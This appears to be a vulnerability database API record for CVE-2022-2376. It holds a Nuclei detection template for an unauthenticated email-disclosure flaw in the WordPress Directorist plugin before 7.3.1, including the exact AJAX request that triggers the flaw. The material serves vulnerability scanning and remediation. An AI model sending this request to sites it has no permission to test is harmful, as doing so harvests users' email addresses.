{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-2376/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-2376/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-2376/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-2376/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-2376/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-2376"},"sightings":{"href":"/api/v1/sightings/cve-2022-2376"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-2376.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2022-2376\n\ninfo:\n  name: WordPress Directorist <7.3.1 - Information Disclosure\n  author: Random-Robbie\n  severity: medium\n  description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.\n  impact: |\n    An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.\n  remediation: Fixed in version 7.3.1.\n  reference:\n    - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-2376\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2022-2376\n    cwe-id: CWE-862\n    epss-score: 0.01836\n    epss-percentile: 0.77999\n    cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 1\n    vendor: wpwax\n    product: directorist\n    framework: wordpress\n  tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'directorist-authors__card__details__top'\n          - 'directorist-authors__card__info-list'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - text/html\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100f1314d3f18350b679336d1a0713087f893d37bfaf46cb73d05eb31629204d18e02200b3c1502bdadfd7a8230fc0b678370d15455cf641233f5a762783f6f4d5ce2f6:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-2376"}